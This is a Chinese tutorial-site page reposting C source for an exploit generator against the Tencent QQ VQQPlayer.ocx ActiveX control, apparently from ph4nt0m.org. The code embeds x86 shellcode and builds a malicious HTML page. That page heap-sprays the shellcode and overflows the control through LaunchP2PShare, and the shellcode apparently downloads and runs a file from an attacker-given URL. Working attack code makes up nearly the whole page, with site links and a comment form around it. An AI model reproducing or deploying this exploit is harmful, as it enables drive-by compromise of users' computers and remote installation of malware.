教程(视频,书籍)下载:  ASP.NET AutoCAD 数据库 C# ASP java photoshop 网页设计 delphi 3dmax Flash C++ VB 张孝祥 实例   更多请进入BIBIDU搜索

"\xe1\x03\xe1\x03\xe1\x03\xe1\x83\xec\x04\x5a\x53\x8b\xda\xe2\xf7"
"\x52\xff\xe0\x55\x8b\xec\x8b\x7d\x08\x8b\x5d\x0c\x56\x8b\x73\x3c"
"\x8b\x74\x1e\x78\x03\xf3\x56\x8b\x76\x20\x03\xf3\x33\xc9\x49\x41"
"\xad\x03\xc3\x56\x33\xf6\x0f\xbe\x10\x3a\xf2\x74\x08\xc1\xce\x0d"
"\x03\xf2\x40\xeb\xf1\x3b\xfe\x5e\x75\xe5\x5a\x8b\xeb\x8b\x5a\x24"
"\x03\xdd\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5"
"\x5e\x5d\xc2\x08\x00\xe8\xf3\xfe\xff\xff\x55\x52\x4c\x4d\x4f\x4e"
"\x00";

char * header =
"<!-- axis' exploit! -->\n\n"
"<html>\n"
"<head>\n"
"<script language=\"javascript\">\n"
"\tvar heapSprayToAddress = 0x0c010101;\n"
"\tvar shellcode = unescape(\"%u9090\"+\"%u9090\"+ \n";




char * footer =
"\n"
"var heapBlockSize = 0x100000;\n" //如果太小了，会造成时间上来不及分配，导致溢出失败
"var payLoadSize = shellcode.length * 2;\n"
"var spraySlideSize = heapBlockSize - (payLoadSize+0x38);\n"
"var spraySlide = unescape(\"%u9090%u9090\");\n"
"spraySlide = getSpraySlide(spraySlide,spraySlideSize);\n"
"heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize;\n"
"memory = new Array();\n\n"
"for (i=0;i<heapBlocks;i++)\n{\n"
"\t\tmemory[i] = spraySlide + shellcode;\n}\n"

"function getSpraySlide(spraySlide, spraySlideSize)\n{\n\t"
"while (spraySlide.length*2<spraySlideSize)\n\t"
"{\n\t\tspraySlide += spraySlide;\n\t}\n"
"\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\n\treturn spraySlide;\n}\n\n"
"</script>\n";



char * trigger =
"\n<script>\n"
"function AxisFun()\n"
"{\n"
"\tevil.LaunchP2PShare(\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\\x0c\", 10000);\n"

"\n}\n"

"</script>\n"
"</head>\n"
"<OBJECT ID=\"evil\" CLASSID=\"CLSID:{AC3A36A8-9BFF-410A-A33D-2279FFEB69D2}\"></OBJECT>\n"

"<script>java script:AxisFun();</script>\n"
"</html>\n";


// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
{
int i;
for(i=0;i<buffsize;i+=2)
{
if((i%16)==0)
{
if(i!=0)
{
printf("\"\n\"");
fprintf(fp, "%s", "\" +\n\"");
}
else
{
printf("\"");
fprintf(fp, "%s", "\"");
}
}

printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);

fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
}


//把shellcode打印在header后面，然后用 " ) " 闭合
printf("\";\n");
fprintf(fp, "%s", "\");\n");


fflush(fp);
}




void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};

int sc_len = 0;


if (argc < 2)
{
printf("Tencent QQ VQQPlayer.ocx (all version) 0day!\n");
printf("Bug Found by axis@ph4nt0m\n");
printf("Date: 2006-12-27\n");
printf("\r\nUsage: %s <URL> [Local htmlfile]\r\n\n", argv[0]);
exit(1);
}

url = argv[1];


if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
{
printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
return;
}

printf("[+] download url:%s\n", url);

if(argc >=3) file = argv[2];
printf("[+] exploit file:%s\n", file);

fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error!\n");
return;
}


//build evil html file
fprintf(fp, "%s", header);
fflush(fp);

memset(buf, 0, sizeof(buf));
sc_len = sizeof(sc)-1;
memcpy(buf, sc, sc_len);
memcpy(buf+sc_len, url, strlen(url));

sc_len += strlen(url)+1;
PrintPayLoad((char *)buf, sc_len);

fprintf(fp, "%s", footer);
fflush(fp);

fprintf(fp, "%s", trigger);
fflush(fp);

printf("[+] exploit write to %s success!\n", file);
}



----------------------------------------------------------------------------------------

来源:ph4nt0m.org
作者:axis
关键字：QQ,漏洞,Activex,拒绝服务
发表日期：2007-1-24 0:26:13

网页显示有限 阅读全文请下载本文完整版WORD文档

上一篇：IE (MS07-004) 网马制作(源码实例)   下一篇：迅雷5 ThunderAgent Module 远程拒绝服务漏洞

1.Tencent QQ 多个远程溢出漏洞(1)
2.Tencent QQ 多个远程溢出漏洞(2)
3.Tencent QQ 多个远程溢出漏洞(3)

共3页 9 7 [1] [2] [3] 8 :>

本文的相类似文章

迅雷5 ThunderAgent Module 远程拒绝服务漏洞 Tencent QQ 多个远程溢出漏洞 Windows矢量标记语言缓冲区溢出漏洞(MS07-004) ASP漏洞分析和解决方法(10) ASP漏洞分析和解决方法(10) ASP漏洞分析和解决方法(9) ASP漏洞分析和解决方法(8) ASP漏洞分析和解决方法(7) ASP漏洞分析和解决方法(6) ASP漏洞分析和解决方法(5)

网友评论 查看本文全部评论
笔 名：	*
评 论：	最多500字。当前字数：0
联系方式：
验证码：